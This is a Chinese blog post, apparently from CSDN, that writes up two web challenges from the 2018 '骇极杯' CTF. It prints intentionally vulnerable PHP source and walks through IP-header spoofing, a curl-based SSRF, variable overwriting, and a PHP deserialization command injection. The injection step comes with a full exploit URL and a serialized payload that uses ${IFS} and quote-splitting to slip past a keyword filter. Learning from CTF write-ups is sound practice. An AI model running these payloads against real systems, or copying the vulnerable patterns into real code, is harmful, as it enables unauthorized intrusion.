骇极杯-Web

最新推荐文章于 2021-07-14 16:25:13 发布
最新推荐文章于 2021-07-14 16:25:13 发布
阅读量925 收藏
点赞数
分类专栏: CTF之Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wyj_1216/article/details/83926728
版权

“骇极杯”全国大学生网络安全邀请赛WriteUp

web1

首先,burpsuite抓一波流量

将GET改为POST,并且post admin=1

访问robots.txt

发现有source.php和flag.php

访问flag.php无果,所以只能去看source.php

这里看到需要伪造ip
在头中伪造ip只有几种情况:xff xci clientip remoteaddr

这里添加X-Client-IP:127.0.0.1

继续post url

这里就能看到加载了图片

卡在这里好久,忽然想到因为是127.0.0.1会不会是file协议
进行尝试

发现还是会加载,在上面图片中也发现,不是jpg而是html
所以这里curl一下

顺便拿到了题目源码

<?php
error_reporting(0);
include "flag.php";
echo "you need to login as admin!";
echo "<!-- post param  'admin' -->";
if(isset($_POST['admin']))
{
    if($_POST['admin']==1)
    {
        if($_SERVER['HTTP_X_CLIENT_IP'])
        {
            if(isset($_POST['url']) && parse_url($_POST['url'])['host']=='www.ichunqiu.com')
            {
                $curl = curl_init();
                curl_setopt($curl, CURLOPT_URL, $_POST['url']);
                curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
                $content = curl_exec($curl);
                curl_close($curl);
                $filename='download/'.rand().';img1.jpg';
                file_put_contents($filename,$content);
                echo $_POST['url'];
                $img="<img src=\"".$filename."\"/>";
                echo $img;
            }
            else
            {
                echo "you need post url: http://www.ichunqiu.com";
            }
        }
        else
        {
            echo "only 127.0.0.1 can get the flag!!";
        }
    }

}
else
{
    $_POST['admin']=0;
}

顺带就拿到了flag

web2

这道题目首先用扫描软件扫到了泄漏的源码

<?php
error_reporting(0);
class come{    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }           
    function echo($host){
        system("echo $host");
    }
    function __destruct(){
        if (in_array($this->method, array("echo"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 

}

$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
foreach($_GET as $key => $value) {
        if($i===1)
        {
            $i++;   
            $$key = $value;
        }
        else{break;}
}
if($first==="doller")
{
    @parse_str($_GET['a']);
    if($var==="give")
    {
        if($bbb==="me")
        {
            if($ccc==="flag")
            {
                echo "<br>welcome!<br>";
                $come=@$_POST['come'];
                unserialize($come); 
            }
        }
        else
        {echo "<br>think about it<br>";}
    }
    else
    {
        echo "NO";
    }
}
else
{
    echo "Can you hack me?<br>";
}
?>

然后是反序列化漏洞

直接firefox f12 hackbar

http://8c2a8dee973d47ffbf0027140ec9e6dfc88e980052e84454.game.ichunqiu.com/?first=doller&a=var=give%26bbb=me%26ccc=flag

come=O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3Bs%3A4%3A%22echo%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bs%3A4%3A%22host%22%3Bs%3A20%3A%22123%26cat%24%7BIFS%7D%2Ffl%22%22ag%22%3B%7D%7D123

直接拿到flag

白衣w
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第三届上海大学生网络安全赛(线上赛)-MS1战队-Writeup
01-20
ctf write up 第三届上海大学生网络安全赛(线上赛)-MS1战队
Htlab_Weekly_Ctf_16
qq_45628145的博客
07-26 528
有点另类的SSRF 输出127.0.0.1,有回显说要post一个admin 提示需要登陆 改成admin=1 试了一下发现是加X-Client-IP,其实遇到这种问题,也可以不这么麻烦,直接把X-Forwarded-For、X-Client-IP、X-Real-IP全部加上就好了,然后提示读源码 <?php // /opt/flag.txt function getUrlContent($url){ // $url = safe($url); $url = escapes
hackme_Login As Admin 0
weixin_30448603的博客
10-19 194
先上payload, 再说原理 1、 Username:\' union select 1,1,1,1# Password:a 2、 Username:\' or 1 limit1,1# Password:a 下面是分析讲解: 首先,点击Source Code按钮查看源代码 可以得到以下信息: 1、过滤了单引号,可以用\'来绕过滤 2、user表中四个列:id...
login as admin 01
weixin_43511698的博客
10-18 1469
hackme login as admin 01 login as admin 01 此题与login as admin 0 有联系 使用 union 注入 查看一共几行 ’ union select 1# ’ union select 1,2# ’ union select 1,2,3# ’ union select 1,2,3,4# 此时出现回显2 说明数据库在第二行 接下来共四步(查看数据...
CTF竞赛中的奇葩注册方式
syh_486_007的专栏
03-03 3357
最近看了来看ctftime中的比赛,看到ictf比赛,就索性点进去看看,发现,我XXXX,竟然用Python写了写了一个注册client端,需要用程序注册,现将源码更新如下,以后我们国内比赛说不定也可以参考一下: # # The iCTF game client. # # Written by subwire and the iCTF team, 2015 #
[hackme] login as admin 1 && login as admin 1.2
Selukwe的博客
03-02 1259
题目链接: https://hackme.inndy.tw/login1/ 代码分析 1、过滤了空格,但可以用/**/绕过 2、题目不再提供表名。 3、从数据库查询之后,不会回显数据库中的内容(也就是无法用union select回显出来) 但跟上一题一样,构造出SQL查询之后,只要isadmin值为1,认为是admin,即获得flag1值。 解题...
login as Admin zabbix无法进入登陆界面
07-14 1309
登录zabbix的web页面更新动作总是会跳到别的页面,我使用了同一个浏览器打开三个不同的zabbix,报错Access denied.Your are logged in as guest. You have no permissions to access this page.。。。。,后来发现是因为我是通过跳板机连接的隧道过去的,同一个浏览器打开不同的zabbix页面,会使用同一个cookie就串了,后来换了一个浏览器好了 ...
CTF wp 2018“骇极杯”全国大学生网络安全邀请赛暨第四届上海市大学生网络安全大赛线上赛 writeup
Thea_1207的博客
11-05 3732
为0x00 签到题操作内容: | 登陆比赛界面上去看到签到题,一般情况下签到题是没有难度的题目给定一串字符MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q Base32 一闪而过,比的就是手速,解码拿到flag。 FLAG 值: 标志{35222d30-439e-4afb-91F4-abebc73fe0...
2018上海CTF“骇极杯”逆向WP
11-12
2018上海CTF“骇极杯”逆向WP2018上海CTF“骇极杯”逆向WP
text-generation-webui-main
09-20
多种模型后端: transformers、llama.cpp、ExLlama、AutoGPTQ、GPTQ-for-LaMa、ctransformers
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
spring-web-5.1.5.RELEASE.jar
01-08
spring-web-5.1.5.RELEASE.jar
spring-webmvc.jar
01-24
spring-webmvc-4.jar 下载spring-webmvc-4.jar 下载spring-webmvc-4.jar 下载spring-webmvc-4.jar 下载spring-webmvc-4.jar 下载spring-webmvc-4.jar 下载
greenplum-cc-web-6.8.0-gp6-rhel7-x86_64.zip
09-14
greenplum-cc-web-6.8.0-gp6-rhel7-x86_64.zip
攻防世界-web -高手进阶区-PHP2
wyj_1216 House
07-09 9933
题目 writeup 首先发现源码泄露 /index.phps 查看源代码 即: <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "admin") { e...
护网杯-easy_tornado
wyj_1216 House
10-14 7617
进入题目网站,发现三个文件 首先进入第一个文件Orz.txt,发现提示渲染函数render(),直接将文件内容显示在网页上 再进入第二个文件hint.txt,发现提示md5(cookie_secret + md5(filename)),即先将filenamemd5加密,再将cookie_secret与md5加密后的filename进行md5加密,也就是说,目前我们需要知道的是filename和...
攻防世界-web-新手练习区(1)
wyj_1216 House
05-03 6012
view source 题目 Where is the FLAG 查看页面源代码,但是右键好像不管用了~ writeup F12查看,发现flag get post 题目 GET&POST writeup 首先用GET方式提交一个名为a,值为1的变量 在Firefox中,有个很好用的HackBar 再按照提示,以POST方式提交一个名为b,值为2的变量 得到flag~ 知识点 1、H...
利用GitHub、docker部署CTF-web题目复现
wyj_1216 House
08-07 4537
前言 前面写了kali linux的docker安装以及在docker上部署搭建sqli-labs靶场,这篇文章简单介绍利用GitHub和docker简单搭建CTF-web题目进行复现 学习记录 环境准备 这里有一个非常好的,实用的网站 https://github.com/CTFTraining/CTFTraining 里面包含了很多web题目,利用docker-compose搭建 准备docker-compose 在终端运行 apt-get install docker docker-compose
datax-web安装
最新发布
09-26
datax-web的安装可以通过以下几个步骤完成: 1. 下载datax-web的安装包。 2. 解压安装包到指定目录。 3. 移动解压后的文件到指定目录。 具体步骤如下: 1. 在选定的安装目录,使用命令tar -zxvf datax-web-{VERSION}.tar.gz解压安装包。 2. 使用命令mv datax-web-2.1.2 datax-web将解压后的文件夹改名为datax-web。 或者 1. 使用命令b.tar -xvf datax-web-2.1.2.tar -C /opt &解压安装包。 2. 使用命令mvdatax-web-2.1.2datax-web将解压后的文件夹改名为datax-web。 你还可以通过执行一键安装脚本来安装datax-web,详情可参考https://github.com/WeiYe-Jing/datax-web/blob/master/doc/datax-web/datax-web-deploy.md#2执行一键安装脚本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值